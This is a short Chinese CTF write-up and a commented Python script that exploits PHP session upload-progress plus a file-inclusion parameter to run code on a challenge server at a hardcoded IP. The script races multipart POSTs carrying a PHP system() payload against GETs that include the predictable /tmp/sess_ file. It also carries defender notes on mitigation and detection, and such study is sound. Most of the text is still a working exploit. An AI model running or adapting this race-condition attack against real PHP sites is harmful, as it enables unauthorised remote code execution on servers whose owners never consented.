临时文件
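当 session 文件名可控时(脚本中通过 PHPSESSID Cookie 指定),session 文件会落在可预测的路径,因此可以到指定目录下(脚本中为 /tmp/sess_<PHPSESSID>)访问该文件。防御上应关闭 session.upload_progress.enabled,并且不要把请求参数直接用作文件路径。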
Py脚本
# -*- coding: utf-8 -*-
import io
import threading

import requests
# Base URL of the CTF challenge instance this script talks to.
myurl = 'http://1.14.71.254:28893/'

# Client-chosen session id. It is sent as the PHPSESSID cookie and is also the
# suffix of the session file path requested later (/tmp/sess_<sessid>).
# Defender note: session.use_strict_mode = 1 is intended to make PHP refuse
# session ids it did not issue itself, so the file name stops being
# predictable from the client side.
sessid = '7t0'

# In-memory buffer of 8 KiB of filler bytes.
# NOTE(review): nothing in the visible script reads this object.
myfile = io.BytesIO(1024 * b'hakaiisu')

# Form field sent with every upload. The field name is the default value of
# PHP's session.upload_progress.name; PHP stores the field's value inside the
# upload-progress entry it writes to the session file while the upload runs.
# Defender note: session.upload_progress.enabled = Off disables that write.
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('tac /nssctfasdasdflag');?>"}

# Cookie jar pinning every request to the session id chosen above.
mycookie = dict(PHPSESSID=sessid)
def writeshell(session):
    """Send the multipart upload request to ``myurl`` in an endless loop.

    Every request carries the ``writedata`` form field, a small file part
    named ``hakaiisu.txt`` and the fixed ``PHPSESSID`` cookie. The function
    never returns; the script runs it on a daemon thread.

    Args:
        session: Accepted for symmetry with ``getshell`` but not used; the
            requests go through the module-level ``requests.post``.

    Defender note: on the server side this shows up as a steady stream of
    multipart POSTs that all contain a ``PHP_SESSION_UPLOAD_PROGRESS`` field
    and reuse one client-supplied session id, which is a usable detection
    signal in web or WAF logs. ``session.upload_progress.enabled = Off``
    removes the session write these requests depend on.
    """
    # Same multipart file part on every iteration: (filename, content).
    upload_part = {'file': ('hakaiisu.txt', 123)}
    while True:
        requests.post(url=myurl, data=writedata, files=upload_part, cookies=mycookie)
def getshell(session):
    """Poll the ``file`` parameter until the session file content comes back.

    Requests ``<myurl>?file=/tmp/sess_<sessid>`` repeatedly. As soon as a
    response body contains the marker ``upload_progress`` the body is printed
    and the function returns.

    Args:
        session: Not used; the requests go through the module-level
            ``requests.get``.

    Defender note: the ``file`` parameter presumably reaches a PHP
    ``include``/``require`` on the target (the server code is not shown
    here). The fix on that side is to map the parameter to an allowlist of
    known files instead of treating it as a path, and to keep the session
    save path outside anything ``open_basedir`` permits the application to
    read. Requests whose ``file`` value points at ``sess_*`` files are worth
    alerting on.
    """
    # The path is built from module constants only, so compute it once.
    target = myurl + '?file=' + '/tmp/sess_' + sessid
    while True:
        reply = requests.get(url=target)
        if 'upload_progress' not in reply.text:
            # Session file absent or already cleaned up; try again.
            continue
        print(reply.text)
        return
if __name__ == '__main__':
    # One Session object is created and handed to both workers, although
    # neither of them actually sends requests through it.
    session = requests.Session()

    # Background uploader. It is a daemon thread, so it ends with the process
    # once the foreground poller returns.
    # NOTE(review): this assignment rebinds the module-level name
    # ``writeshell`` from the function to the Thread object.
    writeshell = threading.Thread(target=writeshell, args=(session,), daemon=True)
    writeshell.start()

    # Foreground poller; returns after the first matching response.
    getshell(session)